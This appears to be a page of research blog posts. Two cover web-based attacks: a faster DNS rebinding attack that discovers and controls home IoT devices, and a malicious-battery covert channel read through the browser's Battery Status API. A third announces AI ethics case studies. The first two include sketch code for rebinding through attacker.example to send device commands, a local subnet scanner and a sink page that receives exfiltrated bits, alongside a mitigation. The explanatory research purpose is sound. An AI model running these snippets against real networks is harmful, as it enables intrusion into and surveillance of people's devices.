June 23, 2018


Fast Web-based Attacks to Discover and Control IoT Devices

By Gunes Acar, Danny Y. Huang, Frank Li, Arvind Narayanan, and Nick Feamster

Two web-based attacks against IoT devices made the rounds this week. Researchers Craig Young and Brannon Dorsey showed that a well-known attack technique called “DNS rebinding” can be used to control your smart thermostat, detect your home address, or extract unique identifiers from your IoT devices.

For this type of attack to work, a user needs to visit a web page that contains a malicious script and remain on the page while the attack proceeds. The attack simply fails if the user navigates away before it completes. According to the demo videos, each of these attacks takes longer than a minute to finish, assuming the attacker already knows the IP address of the targeted IoT device.
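To make that timing constraint concrete, here is a hypothetical sketch of what a malicious page’s script might do during a DNS rebinding attack. The domain attacker.example, the endpoint paths, and the “thermostat” marker are all invented for illustration; this is not the researchers’ actual code.

```typescript
// Hypothetical sketch of the script a malicious page runs during a
// DNS rebinding attack. The page was loaded from http://attacker.example,
// whose DNS record (with a very short TTL) initially points at the
// attacker's own server.
async function rebindAndControl(): Promise<void> {
  // The attacker's DNS server now answers further lookups of
  // attacker.example with the IoT device's local IP (e.g. 192.168.1.50).
  // Poll until the browser's cached record expires and rebinds.
  for (;;) {
    try {
      const res = await fetch("http://attacker.example/status");
      const body = await res.text();
      // Once the response looks like the device's API rather than the
      // attacker's server, the origin has rebound to the local device.
      if (body.includes("thermostat")) break;
    } catch {
      // Record not rebound yet, or the request failed; keep waiting.
    }
    await new Promise(resolve => setTimeout(resolve, 1000));
  }
  // Same-origin requests now reach the device's local HTTP API, so the
  // page can read identifiers or send control commands.
  await fetch("http://attacker.example/set_temperature?value=35", { method: "POST" });
}

rebindAndControl();
```

The whole sequence hinges on the browser keeping the page open long enough for the cached DNS record to expire and rebind, which is why dwell time matters.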

According to a study by Chartbeat, however, 55% of typical web users spent fewer than 15 seconds actively on a page. Does this mean that most web users are immune to these attacks?

In a paper to be presented at the ACM SIGCOMM 2018 Workshop on IoT Security and Privacy, we developed a much faster version of this attack: it takes only around ten seconds to discover and attack local IoT devices, and it assumes no prior knowledge of the targeted device’s IP address. Check out our demo video below.
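To give a flavor of the discovery step, here is a minimal, hypothetical sketch of how a page can probe the local network from the browser without knowing any IP address in advance. The subnet prefix is a guess and the timing heuristic is crude; the technique in our paper is considerably faster and more robust than this sketch.

```typescript
// Minimal sketch of browser-based local-network discovery: a request to a
// live host tends to resolve (even opaquely, under "no-cors") much faster
// than a request to an unused address, which simply times out.
async function probe(ip: string, timeoutMs = 300): Promise<boolean> {
  const controller = new AbortController();
  const timer = setTimeout(() => controller.abort(), timeoutMs);
  try {
    await fetch(`http://${ip}/`, { mode: "no-cors", signal: controller.signal });
    return true; // the request completed: likely a live host
  } catch {
    return false; // timeout or network error: likely nothing there
  } finally {
    clearTimeout(timer);
  }
}

async function scanSubnet(prefix = "192.168.1"): Promise<string[]> {
  const candidates = Array.from({ length: 254 }, (_, i) => `${prefix}.${i + 1}`);
  const results = await Promise.all(candidates.map(ip => probe(ip)));
  return candidates.filter((_, i) => results[i]);
}

scanSubnet().then(live => console.log("live local hosts:", live));
```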


Exfiltrating data from the browser using battery discharge information

Modern batteries are powerful and increasingly smart, and their privileged position lets them sense device utilization patterns. A recent research paper identifies a potential threat: researchers from Technion, the University of Texas at Austin, and the Hebrew University describe a scenario in which malicious batteries are supplied to user devices (e.g., via compromised supply chains):

An attacker with brief physical access to the mobile device – at the supply chain, repair shops, workplaces, etc. – can replace the device’s battery. This is an example of an interdiction attack. Interdiction attacks using malicious VGA cables have been used to snoop on targeted users. A malicious battery introduces a new attack vector into a mobile device.

Poisoned batteries are thus capable of monitoring the victim’s system use, enabling the recovery of sensitive user information: which websites were visited (with around 65% precision, better than a random guess), which characters were typed (again with better-than-random accuracy), when a camera shot was taken, and when a call came in. Recovering this data from power measurements is an example of power analysis, a classic side-channel attack. Finally, the battery is also used to exfiltrate the captured information to the attackers.
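As a toy illustration of the matching step behind such power analysis, here is a sketch that guesses which website was visited by correlating an observed power trace against previously recorded reference traces. The traces, site names, and the simple nearest-template classifier are all invented for illustration; the paper’s actual inference is far more sophisticated.

```typescript
// Toy template-matching step of a power-analysis side channel: compare an
// observed power trace against reference traces recorded for known sites,
// and guess the site whose trace correlates best (Pearson correlation).
function correlation(a: number[], b: number[]): number {
  const n = Math.min(a.length, b.length);
  const mean = (xs: number[]) => xs.slice(0, n).reduce((s, x) => s + x, 0) / n;
  const ma = mean(a), mb = mean(b);
  let num = 0, va = 0, vb = 0;
  for (let i = 0; i < n; i++) {
    num += (a[i] - ma) * (b[i] - mb);
    va += (a[i] - ma) ** 2;
    vb += (b[i] - mb) ** 2;
  }
  return va === 0 || vb === 0 ? 0 : num / Math.sqrt(va * vb);
}

function guessWebsite(observed: number[], references: Map<string, number[]>): string {
  let bestSite = "unknown";
  let bestScore = -Infinity;
  for (const [site, trace] of references) {
    const score = correlation(observed, trace);
    if (score > bestScore) {
      bestScore = score;
      bestSite = site;
    }
  }
  return bestSite;
}

// Hypothetical usage with made-up traces:
const refs = new Map([
  ["news.example", [1.2, 3.4, 2.1, 0.8]],
  ["mail.example", [0.4, 0.5, 2.9, 3.1]],
]);
console.log(guessWebsite([1.1, 3.2, 2.3, 0.7], refs)); // likely "news.example"
```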

The whole attack is technically complex, and it is debatable how practical it would be for real-world attackers at this moment. It is nonetheless very interesting, as it highlights how complex our computing devices really are, and how much we inherently need to trust their components.

I’d like to call special attention to the exfiltration channel using the battery. It is a very interesting covert channel.

The W3C Battery Status API, implemented by major web browsers (notably Chrome), allows websites to query the current battery level as well as the rate of charge/discharge. The paper describes how this API can be exploited to remotely exfiltrate the acquired data. All the victim has to do is visit a “sink” website that reads the data. The malicious battery can detect when the browser navigates to this special website and then enable its exfiltration mode.
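For concreteness, here is a minimal sketch of what such a sink page could do with the standard API. The one-bit-per-transition decoding below is a simplification I am assuming for illustration, not the paper’s exact protocol.

```typescript
// Minimal sketch of a "sink" page receiving bits over the charging-state
// covert channel via the W3C Battery Status API (navigator.getBattery()).
async function listenForChargingBits(): Promise<void> {
  // getBattery() is absent from some TypeScript DOM typings, hence the cast.
  const battery = await (navigator as any).getBattery();
  const bits: number[] = [];
  let last = performance.now();

  battery.addEventListener("chargingchange", () => {
    const now = performance.now();
    // Treat each charging/discharging transition as one received symbol.
    bits.push(battery.charging ? 1 : 0);
    console.log(`received bit ${battery.charging ? 1 : 0} after ${(now - last).toFixed(0)} ms`);
    last = now;
  });
}

listenForChargingBits();
```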

And how is the exfiltration done? It works by manipulating the “charging” state: the 0/1 flag that tells a website whether the battery is charging or discharging. But how can the battery induce a steady stream of “charging” state changes in a way that encodes information? The technique employed is very interesting: it uses wireless charging. A resonant inductive charger is built into the battery chip, with the charging coil placed close to the charging hardware, so the battery can make the phone register as “charging” on demand.

Sounds complicated? It does not need to be, since we already assume that the attacker is able to deliver a malicious battery in the first place. Then all the user has to do is visit a website that reads the information using the standard W3C Battery Status API, where the browser supports it (e.g. Chrome is vulnerable, while Firefox, which has removed the API from web content, is immune). In principle, everything happens without any interaction with the operating system; the OS is oblivious to the attack.

There is also this interesting observation:

Since the browser does not seem to limit the update rate, the state change depends entirely on the phone’s software and the charging pad state transition rate. We find that the time to detect the transition from not charging to charging (Tdc) is 3.9 seconds.

At roughly four seconds per detectable transition, this gives the attacker a covert channel with a bandwidth of 0.1-0.5 bits/second. Of course, there is no reason for browsers to surface such frequent switches between charging and discharging. The privacy-by-design mitigation here would be to cap the rate at which charging-state updates are exposed to websites.
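To illustrate what such a cap could look like, here is a hypothetical sketch of a rate-limited event dispatcher. A real browser would implement this internally, and the 60-second interval is an arbitrary choice for illustration.

```typescript
// Hypothetical sketch of a rate-limiting mitigation: surface at most one
// charging-state change per minIntervalMs to script, coalescing rapid
// flips so only the latest state is eventually delivered.
function rateLimitedDispatcher(
  minIntervalMs: number,
  dispatch: (charging: boolean) => void
): (charging: boolean) => void {
  let lastDispatch = -Infinity;
  let pending: boolean | null = null;
  let timer: ReturnType<typeof setTimeout> | null = null;

  return (charging: boolean) => {
    const now = Date.now();
    if (timer === null && now - lastDispatch >= minIntervalMs) {
      lastDispatch = now;
      dispatch(charging);
    } else {
      pending = charging; // coalesce: remember only the latest state
      if (timer === null) {
        timer = setTimeout(() => {
          timer = null;
          if (pending !== null) {
            lastDispatch = Date.now();
            dispatch(pending);
            pending = null;
          }
        }, Math.max(0, minIntervalMs - (now - lastDispatch)));
      }
    }
  };
}

// With a 60-second cap, the channel shrinks to at most one transition per
// minute, i.e. well under 0.02 bits/second.
const report = rateLimitedDispatcher(60_000, c => console.log("charging:", c));
```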

The attack may seem like a stretch (it requires physically replacing the battery, or poisoning hardware at the factory), and at this moment one can imagine many simpler attack methods. Nonetheless it is an important study. Is the sky falling? No. Is the work significant? Yes.

For more information, please see the paper here.

For more information about the privacy by design case study of the Battery Status API, see here.

Princeton Dialogues on AI and Ethics: Launching case studies

Summary: We are releasing four case studies on AI and ethics, as part of the Princeton Dialogues on AI and Ethics.

The impacts of rapid developments in artificial intelligence (“AI”) on society—both real and not yet realized—raise deep and pressing questions about our philosophical ideals and institutional arrangements. AI is currently applied in a wide range of fields—such as medical diagnosis, criminal sentencing, online content moderation, and public resource management—but it is only just beginning to realize its potential to influence practically all areas of human life, including geopolitical power balances. As these technologies advance and increasingly come to mediate our everyday lives, it becomes necessary to consider how they may reflect prevailing philosophical perspectives and preferences. We must also assess how the architectural design of AI technologies today might influence human values in the future. This step is essential in order to identify the positive opportunities presented by AI and unleash these technologies’ capabilities in the most socially advantageous way possible while being mindful of potential harms. Critics question the extent to which individual engineers and proprietors of AI should take responsibility for the direction of these developments, or whether centralized policies are needed to steer growth and incentives in the right direction. What even is the right direction? How can it be best achieved?

Princeton’s University Center for Human Values (UCHV) and the Center for Information Technology Policy (CITP) are excited to announce a joint research project, “The Princeton Dialogues on AI and Ethics,” in the emerging field of artificial intelligence (broadly defined) and its interaction with ethics and political theory. The aim of this project is to develop a set of intellectual reasoning tools to guide practitioners and policy makers, both current and future, in developing the ethical frameworks that will ultimately underpin their technical and legislative decisions. More than ever before, individual-level engineering choices are poised to impact the course of our societies and human values. And yet there have been limited opportunities for AI technology actors, academics, and policy makers to come together to discuss these outcomes and their broader social implications in a systematic fashion. This project aims to provide such opportunities for interdisciplinary discussion, as well as in-depth reflection.

We convened two invitation-only workshops in October 2017 and March 2018, in which philosophers, political theorists, and machine learning experts met to assess several real-world case studies that elucidate common ethical dilemmas in the field of AI. The aim of these workshops was to facilitate a collaborative learning experience that enabled participants to dive deeply into the ethical considerations that ought to guide decision-making at the engineering level, and to highlight the social shifts those decisions may bring about. The first outcomes of these deliberations have now been published in the form of case studies. To access these educational materials, please see our dedicated website: https://aiethics.princeton.edu. These cases are intended for use across university departments and in corporate training, in order to equip the next generation of engineers, managers, lawyers, and policy makers with a common set of reasoning tools for working on AI governance and development.

In March 2018, we also hosted a public conference, titled “AI & Ethics,” where interested academics, policy makers, civil society advocates, and private sector representatives from diverse fields came to Princeton to discuss topics related to the development and governance of AI, including “International Dimensions of AI” and “AI and Its Democratic Frontiers.” This conference sought to use the ethics and engineering knowledge foundations developed through the initial case studies to inspire discussion on AI technology’s wider social effects.

This project is part of a wider effort at Princeton University to investigate the intersection between AI technology, politics, and philosophy. There is a particular emphasis on the ways in which the interconnected forces of technology and its governance simultaneously influence and are influenced by the broader social structures in which they are situated. The Princeton Dialogues on AI and Ethics makes use of the university’s exceptional strengths in computer science, public policy, and philosophy. The project also seeks opportunities for cooperation with existing projects in and outside of academia.